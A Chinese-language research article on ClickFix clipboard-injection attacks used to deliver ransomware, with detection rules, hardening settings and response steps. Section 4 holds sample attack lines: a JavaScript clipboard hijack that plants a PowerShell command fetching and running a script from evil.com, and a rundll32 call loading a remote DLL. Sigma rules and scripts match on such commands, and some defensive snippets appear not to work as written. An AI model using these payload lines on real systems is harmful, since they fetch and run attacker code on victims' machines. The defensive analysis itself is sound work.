ClickFix 攻击链机理与勒索软件防御体系研究

简介: 本文系统剖析ClickFix勒索攻击技术:自2024年兴起,2026年在美洲爆发,通过伪造错误页、CAPTCHA等诱导用户手动执行剪贴板恶意命令,滥用LOLBins实现无文件内存执行与C2隐匿,绕过传统防护。文章拆解全链路机理,提出覆盖Windows/macOS的检测规则、GPO配置、EDR优化及意识培训等闭环防御方案。(239字)

摘要

自 2026 年 3 月起,以 ClickFix 为入口的勒索软件攻击在美洲地区呈现爆发式增长,该技术由 Proofpoint 于 2024 年 6 月首次命名,已从单一社工攻击演变为 IAB、APT 组织与勒索团伙通用的初始访问手段。Halcyon 威胁报告显示,ClickFix 依托伪造系统错误、CAPTCHA 验证、浏览器更新等诱饵页面,通过剪贴板注入恶意命令,诱导用户在 Run 对话框、PowerShell 或终端手动执行,结合 LOLBins 无文件执行、内存载荷注入、C2 隐匿通信等技术,可绕过传统终端防护与边界安全设备,快速完成从初始接入到数据窃取、横向移动直至文件加密的全链路攻击,已成为 Qilin、Termite、Interlock、LeakNet 等勒索家族的核心入口。本文以 Halcyon 公开的勒索攻击杀伤链为实证基础,系统拆解 ClickFix 从剪贴板注入到数据加密的全流程技术机理,剖析其社工诱导、无文件执行、权限规避、C2 隐匿的核心优势,结合 Windows 与 macOS 双平台给出可落地的检测规则、防御配置与应急脚本,构建覆盖终端管控、行为检测、网络拦截、意识培训、应急响应的闭环防御体系,为抵御 ClickFix 驱动的勒索攻击提供理论支撑与工程化方案。

关键词:ClickFix;勒索软件;剪贴板攻击;无文件执行;LOLBins;终端安全

image.png 1 引言

随着终端防护与边界安全能力持续增强,传统钓鱼邮件、漏洞利用、恶意附件等攻击路径的成功率显著下降,威胁组织逐步转向社会工程 + 合法工具滥用的混合攻击模式。ClickFix 作为 2024 年以来崛起的典型社工攻击技术,以极低的成本、极高的隐蔽性与极强的通用性,快速成为初始访问中间商(IAB)、APT 组织与勒索软件团伙的首选入口。

Halcyon 勒索软件运营中心监测数据显示,2026 年 3—4 月,ClickFix 活动在美洲地区激增,相关预警成功拦截 Qilin、Termite、Interlock、LeakNet 等多起勒索部署事件,且在多数场景下可绕过除 Halcyon 外的其他安全方案,暴露了传统防御体系对 “用户主动执行恶意命令” 类攻击的检测盲区。ClickFix 的核心威胁在于:将攻击执行权转移给用户自身,依托系统自带工具实现无文件落地,通过伪造高可信界面突破心理防线,形成 “剪贴板→命令执行→远程控制→凭证窃取→横向移动→数据加密” 的完整杀伤链。

当前安全研究多聚焦 ClickFix 的单一攻击环节,对其与勒索软件结合的全链路机理、跨平台实现、防御失效根源与闭环防御体系的系统性研究不足。反网络钓鱼技术专家芦笛指出,ClickFix 代表了下一代社会工程攻击的演进方向 ——从诱导点击转向诱导执行,从文件恶意转向行为恶意,从边界突破转向内部自爆,防御必须从特征匹配升级为行为基线 + 上下文关联 + 权限约束的多维联动模式。

本文以 Halcyon《从剪贴板到加密:ClickFix 在勒索攻击中的关键作用》报告为核心素材,结合真实攻击案例与技术细节,开展全维度机理剖析、检测规则开发、防御配置实现与应急体系构建,为机构抵御 ClickFix 驱动的高级勒索攻击提供可落地、可验证、可复用的解决方案。

2 ClickFix 攻击基础理论与技术背景

2.1 概念定义与发展历程

ClickFix 是一种剪贴板注入 + 社工诱导 + 系统工具滥用的混合攻击技术,通过伪造高可信页面诱导用户将剪贴板中的恶意命令粘贴至 Run 对话框、PowerShell 或终端并手动执行,实现无文件、无接触、高隐蔽的初始访问。

发展历程:

2024 年 6 月:Proofpoint 首次命名并披露,以伪造错误提示为核心诱饵;

2024 年下半年:使用率暴涨 500%,成为仅次于钓鱼邮件的第二大攻击向量;

2025 年:被 Kimsuky、MuddyWater、APT28 等 APT 组织采纳,载荷扩展至窃密木马、RAT;

2026 年 Q1:与勒索软件深度耦合,成为 Qilin、Termite、Interlock、LeakNet 的标准入口,自动化程度提升至无需手动粘贴,通过 rundll32.exe 自动执行。

2.2 核心技术支撑体系

剪贴板注入:页面 JavaScript 静默改写用户剪贴板,替换为恶意命令;

社工诱导:伪造 CAPTCHA、系统错误、浏览器更新、Cloudflare 验证等高可信界面;

LOLBins 滥用:依托 PowerShell、cmd、mshta、curl、rundll32 等系统自带工具执行;

无文件执行:载荷直接注入内存,不落地文件,规避传统 AV 检测;

C2 隐匿:基于 Cloudflare Workers、区块链智能合约、社交平台死信队列实现通信隐匿。

2.3 攻击效能与威胁定位

ClickFix 具备三高一低核心优势:

隐蔽性高:用户主动执行,无恶意进程特征,无文件落地;

通用性高:适配 Windows、macOS,可投递窃密、RAT、勒索等全类型载荷;

成功率高:依托信任伪装与人性弱点,非技术人群命中率极高;

成本极低:无需 0day 漏洞,无需定制恶意代码,可批量规模化部署。

反网络钓鱼技术专家芦笛强调,ClickFix 的本质是把受害者变成攻击执行者,传统防御体系的 “阻止恶意代码运行” 逻辑完全失效,必须从 “控代码” 转向 “控行为、控权限、控上下文”。

2.4 与勒索软件的耦合逻辑

ClickFix 为勒索攻击提供最优初始入口:

快速获取终端控制权,缩短攻击周期;

无文件落地,降低提前暴露风险;

可批量获取大量节点,提升勒索收益;

天然适配双勒索模式(数据窃取 + 文件加密)。

Halcyon 实战数据证实,ClickFix 已成为当前勒索软件杀伤链中最关键的入口节点。

3 ClickFix 驱动的勒索软件全攻击链拆解

3.1 攻击总体流程(Halcyon 勒索杀伤链)

ClickFix 驱动的勒索攻击遵循标准化 8 阶段闭环:

初始访问→远程接入→环境侦察→凭证窃取→横向移动→安全规避→数据窃取→数据加密

3.2 初始访问:剪贴板注入与命令执行

攻击入口:恶意广告、SEO 投毒、钓鱼邮件、被入侵站点跳转。

核心诱导场景:

伪造 Cloudflare DDoS 保护验证;

虚假浏览器 / Office 更新提示;

假 CAPTCHA “人类验证”;

系统错误弹窗 “一键修复”。

技术实现:

页面 JavaScript 通过document.execCommand("copy")静默注入恶意命令到剪贴板;

诱导用户按 Win+R 打开 Run,粘贴并执行;

2026 年新变种:通过 rundll32.exe 自动执行,取消手动粘贴步骤,攻击完全静默。

典型恶意命令示例:

powershell

powershell -ExecutionPolicy Bypass -NoP -NonI -W Hidden -EncodedCommand ZQBuAGMA...

该命令会绕过执行策略、隐藏窗口、解码并执行内存载荷。

3.3 远程接入:RAT 部署与 C2 隐匿

载荷投递后,攻击者部署以下 RAT 实现持久控制:

MIMICRAT/AstarionRAT、CastleRAT、QuasarRAT、NetSupport RAT。

C2 通信隐匿技术:

基于 Cloudflare Workers/CDN 转发流量,伪装正常 HTTPS 请求;

EtherHiding 技术:C2 配置与载荷地址存入币安智能链智能合约;

Steam 社区主页作为死信解析器,获取 C2 地址;

加密信道传输,规避流量检测与内容解析。

3.4 环境侦察:系统信息与安全状态收集

依托 LOLBins 实现无痕迹侦察:

reg.exe 枚举安全软件、提取 MachineGuid;

findstr.exe 检索敏感配置;

采集硬件配置,优化挖矿 / 勒索行为,避免触发告警。

侦察目标:

已安装安全产品列表;

系统权限、域身份、网络拓扑;

敏感数据位置、备份状态。

3.5 凭证窃取:全域凭据捕获

部署多级窃密组件:

窃密木马:Lumma Stealer、Vidar、StealC、AMOS(macOS);

Cobalt Strike Beacon:手动凭证获取、内存抓取;

加载器:Matanbuchus 3.0、DonutLoader、Latrodectus。

窃取范围:

浏览器密码、Cookie、会话令牌;

邮件、云办公、VPN、SSH 凭据;

域管账号、本地管理员 Hash。

3.6 横向移动:内网全域渗透

以沦陷节点为跳板,实现内网全覆盖:

Cobalt Strike Beacon 持久化驻留;

凭据传递、Pass-the-Hash、Pass-the-Ticket;

共享遍历、SMB 爆破、WinRM 远程执行;

批量控制服务器、终端、核心业务系统。

3.7 安全规避:无痕迹突破防护

ClickFix 攻击全流程规避检测:

滥用 LOLBins:curl、mshta、finger、reg、findstr 等伪装正常运维;

内存注入:基于 Deno runtime 直接加载载荷,无磁盘痕迹;

对抗检测:补丁 ETW、禁用 AMSI,盲杀 EDR;

剪贴板注入:绕过浏览器沙箱与下载保护。

3.8 数据窃取与加密:双勒索闭环

数据窃取:加密信道外泄数据,用于二次勒索;

文件加密:使用 MachineGuid 绑定加密密钥,单设备单密钥,无攻击者合作无法解密;

勒索提示:部署勒索信,威胁数据泄露 + 文件永久丢失。

涉及勒索家族:Qilin、Termite(Velvet Tempest)、LeakNet、Interlock。

3.9 攻击链路技术总结

ClickFix 实现了从剪贴板到加密的零断点、高隐蔽、高效率勒索闭环:

社工诱导→剪贴板注入→命令执行→RAT 控制→凭证窃取→横向渗透→安全规避→数据窃取→文件加密。

全程无恶意文件、无高危漏洞、无异常进程,传统防御完全失效。

4 ClickFix 攻击核心技术机理深度分析

4.1 剪贴板注入与社工诱导机理

4.1.1 前端剪贴板劫持技术

恶意页面通过 JavaScript 实现静默复制:

// 剪贴板注入核心代码

function maliciousCopy() {

   let cmd = "powershell -ExecutionPolicy Bypass -NoP -W Hidden -C Invoke-WebRequest http://evil.com/payload.ps1 | IEX";

   navigator.clipboard.writeText(cmd);

   alert("验证代码已复制,请按Win+R粘贴执行以完成验证");

}

// 绑定点击/焦点事件自动触发

document.getElementById("fake_captcha").addEventListener("click", maliciousCopy);

用户点击假验证码时,恶意命令覆盖剪贴板。

4.1.2 社工诱导心理学机制

权威信任:伪装 Cloudflare、Microsoft、Google 等高可信品牌;

紧迫感:“浏览器崩溃”“账号锁定”“DDoS 攻击中”;

简单指令:“复制→粘贴→回车” 三步,降低执行门槛;

技术伪装:命令添加注释REM I am not a robot,伪装验证逻辑。

4.2 无文件执行与 LOLBins 滥用机理

4.2.1 无文件执行核心逻辑

ClickFix 不落地文件,全程内存执行:

命令直接下载并执行载荷;

使用 rundll32、regsvr32、mshta 加载内存 DLL;

Deno runtime 执行 JavaScript 载荷,无磁盘痕迹。

4.2.2 LOLBins 攻击链示例

cmd

rundll32.exe http://evil.com/payload.dll,EntryPoint

该命令通过系统自带工具加载远程恶意 DLL,传统 AV 无告警。

4.3 权限规避与终端对抗机理

用户主动执行:绕过 UAC、应用白名单、行为拦截规则;

AMSI 禁用:载荷执行前关闭 AMSI,规避脚本检测;

ETW 补丁:清除事件跟踪日志,降低溯源能力;

隐蔽窗口:使用 - W Hidden、-NonI 参数隐藏 PowerShell 窗口。

4.4 C2 通信隐匿机理

CDN 中转:Cloudflare Workers 封装 C2 流量,伪装正常 HTTPS;

区块链存储:C2 地址存入智能合约,难以溯源关停;

死信队列:Steam、GitHub 等公共平台作为地址解析节点;

加密传输:TLS + 自定义加密,规避流量特征识别。

4.5 跨平台实现机理

4.5.1 Windows 平台

Run 对话框、PowerShell、cmd、rundll32、mshta 为核心载体。

4.5.2 macOS 平台

诱导打开 Spotlight,粘贴恶意命令;

滥用applescript:// URL Scheme 自动打开脚本编辑器;

执行 curl 下载 AppleScript 载荷,窃取钥匙串凭据;

绕过 macOS 26.4 终端粘贴扫描保护。

4.6 防御失效根源总结

特征检测失效:无恶意文件、无恶意哈希、无恶意域名;

权限逻辑失效:用户主动执行,防护工具视为合法操作;

上下文缺失:单一维度无法判断命令是否为攻击者诱导;

意识短板:用户对 “复制粘贴执行命令” 的风险认知不足。

5 ClickFix 攻击检测方法与代码实现

5.1 进程行为检测规则(Sigma)

yaml

title: ClickFix异常Run对话框执行

status: 实验性

logsource:

 product: windows

 category: process_creation

detection:

 selection:

   ParentImage: "explorer.exe"

   Image|endswith:

     - "\powershell.exe"

     - "\cmd.exe"

     - "\mshta.exe"

     - "\rundll32.exe"

   CommandLine|contains:

     - "ExecutionPolicy Bypass"

     - "-NoP"

     - "-NonI"

     - "-W Hidden"

     - "Invoke-WebRequest"

     - "IEX"

     - "EncodedCommand"

 condition: selection

falsepositives:

 - 授权运维脚本

level: 高危

tags:

 - ClickFix

 - 初始访问

 - 无文件执行

5.2 剪贴板异常注入检测(PowerShell)

powershell

# 监控剪贴板敏感命令

Register-ObjectEvent -InputObject ([Windows.ApplicationModel.DataTransfer.Clipboard])

-EventName ContentChanged

-Action {

   $text = Get-Clipboard

   if ($text -match "powershell.*Bypass|IEX|Invoke-WebRequest|rundll32|mshta") {

       Write-Host "风险:剪贴板检测到ClickFix类命令" -ForegroundColor Red

       Write-Host $text

       # 可触发告警/隔离/清空剪贴板

       # Set-Clipboard ""

   }

}

5.3 Run 对话框历史检测(PowerShell)

powershell

# 检测RunMRU异常命令

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

-ErrorAction SilentlyContinue | ForEach-Object {

   $props = $_.PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" }

   foreach ($p in $props) {

       if ($p.Value -match "powershell|cmd|mshta|rundll32.*http|EncodedCommand") {

           Write-Host "Run历史发现ClickFix命令:" $p.Value -ForegroundColor Red

       }

   }

}

5.4 异常 LOLBins 执行检测

yaml

title: 异常LOLBins外联C2

status: 实验性

logsource:

 product: windows

 category: network_connection

detection:

 selection:

   Image|endswith:

     - "\curl.exe"

     - "\mshta.exe"

     - "\powershell.exe"

     - "\rundll32.exe"

   Initiated: true

   DestinationIp|isPrivate: false

 condition: selection

falsepositives:

 - 合法更新/运维

level: 中高危

tags:

 - ClickFix

 - C2通信

 - LOLBins

5.5 macOS 恶意 AppleScript 检测

bash

运行

# 监控applescript://异常调用

log stream --predicate 'process == "Safari" OR process == "Chrome"'

--debug | grep "applescript://"

反网络钓鱼技术专家芦笛指出,ClickFix 检测的核心是抓行为、抓上下文、抓组合,单一命令特征误报高,必须关联进程父系、命令参数、网络外联、剪贴板内容多维判断。

6 ClickFix 攻击防御体系构建

6.1 终端权限管控

6.1.1 限制 Run 与 PowerShell(GPO)

ini

[Computer Configuration\Policies\Administrative Templates\System]

Prevent access to the command prompt = Enabled

Prevent access to the Run dialog = Enabled

[Computer Configuration\Policies\Administrative Templates\Windows Components\Windows PowerShell]

Turn on Script Block Logging = Enabled

Turn on PowerShell Script Block Logging = Enabled

Set the default execution policy = Restricted

6.1.2 应用白名单(AppLocker/WDAC)

禁止普通用户执行 PowerShell、cmd、mshta;

限制 LOLBins 从非信任路径加载远程资源;

仅允许签名脚本与受信厂商程序执行。

6.1.3 macOS 安全配置

MDM 禁用未签名脚本执行;

浏览器拦截applescript:// URL Scheme;

开启终端粘贴恶意命令告警(macOS 26.4+)。

6.2 网络层防御

恶意域名拦截:屏蔽 ClickFix 诱饵页面、C2、新注册域名;

动态 DNS 屏蔽:拦截 FreeDNS、No-IP、TryCloudflare 隧道;

流量监控:检测 LOLBins 异常外联、加密异常流量;

恶意广告拦截:网络层屏蔽恶意广告,阻断入口。

6.3 行为检测与 EDR 优化

开启进程创建、命令行、PowerShell 脚本块日志;

监控 RunMRU、剪贴板敏感内容、异常父进程;

告警内存注入、AMSI 禁用、ETW 补丁行为;

联动 SOAR 实现一键隔离、进程终止、日志回溯。

6.4 安全意识培训

核心培训要点:

任何官方验证 / 更新绝不会要求复制粘贴命令到 Run / 终端;

看到 “验证”“修复”“更新” 诱导执行命令,立即停止并上报;

剪贴板内容粘贴前务必检查,不执行来源不明的代码。

反网络钓鱼技术专家芦笛强调,ClickFix 防御必须技术 + 意识双轮驱动,意识是第一道防线,技术是最后一道防线,缺一不可。

6.5 应急响应流程

断网隔离:立即断开网络,阻止数据泄露与横向移动;

进程终止:结束 PowerShell、cmd、mshta、rundll32 等可疑进程;

日志回溯:检查 RunMRU、进程日志、网络连接、剪贴板历史;

凭证重置:全量修改邮件、云办公、域账号、VPN 密码;

全盘查杀:扫描内存与磁盘,清除 RAT、加载器、持久化项;

全网排查:横向扫描同类入侵,封堵漏洞入口。

6.6 自动化加固脚本(PowerShell)

powershell

# ClickFix防御加固脚本

function Invoke-ClickFixHardening {

   # 禁用自动运行

   Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" -Value 255 -Force

   # 限制PowerShell执行策略

   Set-ExecutionPolicy Restricted -Force

   # 开启脚本块日志

   New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-PowerShell/Operational" -Name "Enabled" -Value 1 -Force

   # 清空敏感剪贴板

   Set-Clipboard ""

   Write-Host "ClickFix基础加固完成" -ForegroundColor Green

}

Invoke-ClickFixHardening

7 结论与展望

ClickFix 已从单一社会工程攻击演变为勒索软件杀伤链的核心入口技术,依托剪贴板注入、社工诱导、LOLBins 无文件执行、C2 通信隐匿等组合能力,形成从剪贴板到数据加密的完整闭环,可高效绕过传统终端防护、边界安全与人员意识防线,对政企机构构成实质性威胁。Halcyon 的实战数据证实,ClickFix 在 2026 年 Q1 的爆发式增长,标志着勒索攻击正式进入 **“用户主动执行”** 的高级社工阶段,防御范式必须从 “阻止恶意代码” 转向 “约束异常行为、最小权限、上下文感知”。

本文系统拆解 ClickFix 驱动的勒索攻击全流程技术机理,提炼出剪贴板劫持、命令执行、无文件落地、权限规避、横向渗透、数据加密等关键环节的技术特征,构建了覆盖终端管控、网络拦截、行为检测、意识培训、应急响应的闭环防御体系,并提供可直接落地的 Sigma 规则、PowerShell 脚本、GPO 配置与 macOS 防护方案,形成理论 — 技术 — 检测 — 防御 — 响应的完整论证闭环。

反网络钓鱼技术专家芦笛强调,ClickFix 的演进揭示了未来威胁的核心趋势:攻击越来越依赖人性弱点与合法工具,防御越来越依赖行为基线与最小权限。机构必须放弃对特征库、黑名单、静态规则的过度依赖,加快构建以零信任、应用白名单、行为分析、实战化意识培训为核心的主动防御体系。

未来研究将聚焦 ClickFix 自动化变种检测、跨平台统一防御策略、AI 驱动的社工诱导识别、零信任环境下的命令执行管控等方向,持续提升对高级剪贴板攻击与勒索软件的预警、阻断、溯源能力,为数字基础设施安全提供更坚实的理论支撑与工程化方案。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
11天前
|
缓存 安全 Linux
Linux 内核 Copy Fail 漏洞对加密货币基础设施安全影响研究
2026年曝出的Linux内核漏洞Copy Fail(CVE-2026-31431),源于2017年代码缺陷,可让低权限用户稳定提权至root,具备无磁盘痕迹、跨容器逃逸、利用极简等特点,已遭野外利用。该漏洞对加密货币行业构成系统性威胁,覆盖交易所、节点、钱包、矿池等核心设施。本文基于权威报道,剖析其技术机理与风险传导,提出含内核加固、权限隔离、eBPF检测、应急响应的全生命周期防御体系,并提供可复现代码与工程化方案。(239字)
102 7
|
29天前
|
JSON 缓存 开发工具
拒绝/usage用量焦虑,用 Claude Code 自定义状态栏
告别手动查用量!本文教你用Claude Code自定义状态栏,实时显示模型、Git信息、上下文使用率(66%)、缓存命中率、Token消耗及费用(~$23.21)、5小时/7天用量进度等关键指标,支持颜色预警。提供两种配置方式:一键粘贴脚本,或更推荐——直接对话Claude Code,让它自动完成全部配置!
|
1月前
|
数据采集 运维 监控
绝缘子位置检测数据集(2000张)|YOLOv8训练数据集 电力巡检 无人机检测 输电线路监测 智能运维
本数据集含2000张真实电力巡检图像,专为YOLOv8训练优化,聚焦绝缘子位置检测。覆盖山区、城市等多场景及晴/雾/逆光等复杂条件,采用单类别高精度YOLO格式标注,结构标准、即拿即用,助力无人机巡检、智能运维与输电线路安全监测。
174 11
|
13天前
|
JSON 前端开发 测试技术
Kimi-k2.6 流式回包乱序后,我这样接入 ​D​М‌X​Α‌РΙ
kimi-k2.6 不止于聊天,其核心价值在于“可执行交付”:统一支持代码生成、长时程任务、Agent协作、文档→技能复用及多格式输出,具备工程级组合能力。它契合企业对“单模型多工位”的刚需——在研发、内容中台等场景中,稳定闭环完成需求拆解、编码、文档整理等多步任务。真正落地需依托DMXAPI网关实现标准化API集成,解决Web路径的不确定性,让模型能力成为可度量、可审计、可持续的生产基础执行层。(239字)
|
12天前
|
供应链 安全 前端开发
2026 年新型网络威胁演进与防御体系研究 —— 以两起典型攻击为例
本文剖析2026年ShinyHunters入侵Canvas与Play勒索软件利用CLFS零日漏洞两大典型事件,揭示供应链攻击、身份劫持、零日武器化、双重勒索等新威胁特征;提出以身份为中心、零信任为基座的五层防御体系,并提供可落地的令牌校验、提权检测、数据导出监控等代码实现,助力教育、金融等行业构建韧性安全防线。(239字)
172 8
|
1月前
|
移动开发 JavaScript 小程序
前端组件库——uView UI知识点大全
教程来源 http://uklgy.cn/category/strength-training.html uView UI是uni-app生态中广受欢迎的跨平台UI组件库,支持Vue2/3,覆盖小程序、H5、App等多端。组件丰富(60+)、性能优异、文档完善,兼顾开发效率与包体积优化,累计获4.5k+ Star。
|
12天前
|
人工智能 供应链 安全
2026 年全球网络安全威胁态势与关键技术防御研究
本文基于Security Affairs 2026年第576期情报,系统分析Linux无文件远控(QLNX)、Dirty Frag内核提权、AI供应链投毒、Bluekit工业化钓鱼及关键基础设施混合攻击等新型威胁,揭示其内存化、智能化、武器化趋势;提出漏洞治理、供应链管控、钓鱼防御、终端加固、应急响应“五位一体”纵深防御框架,并提供可复现代码与工程化方案。(239字)
233 6
|
14天前
|
人工智能 IDE API
阿里云百炼Coding Plan产品简介:支持模型、收费标准及购买和使用常见问题解答
阿里云百炼Coding Plan是面向开发者和团队的AI编程订阅服务,采用固定月费模式,Pro套餐200元/月提供9万次调用额度,整合千问、Kimi、GLM、MiniMax等顶级模型,全面兼容Claude Code、OpenClaw、Cursor等主流编程工具。额度采用5小时滚动恢复、每周及每月定期重置机制,兼顾开发连续性与成本可控性。其折算成本远低于按量计费,并通过多层级额度设计和华北2地域绑定有效防范欠费风险。适合日常代码生成、智能体开发及IDE插件集成等场景,是开发者以可预期预算拥抱AI编程的高性价比选择。
阿里云百炼Coding Plan产品简介:支持模型、收费标准及购买和使用常见问题解答
|
2月前
|
监控 安全 区块链
基于Windows Terminal的ClickFix攻击链演化与防御机制研究
本文剖析2024年兴起的“ClickFix”新型网络钓鱼攻击:攻击者从诱导用户使用Win+R转向更隐蔽的Win+X→I启动Windows Terminal执行恶意命令,绕过传统检测与安全培训。文章深入解析其多阶段载荷投递、LOLBin滥用、EtherHiding及QueueUserAPC内存注入等关键技术,并提出“零信任命令执行”理念与技术管控、认知重构并重的防御策略。(239字)
198 16
|
1月前
|
人工智能 JavaScript 安全
【新版本新人操作】OpenClaw 部署教程 2026 版操作指南
OpenClaw是一款AI聊天网关一键部署平台,支持多模型接入,自动检测安装依赖,无需技术基础。2026最新版仅需49.7MB空间,纯英文路径安装,含7×24小时技术支持。

热门文章

最新文章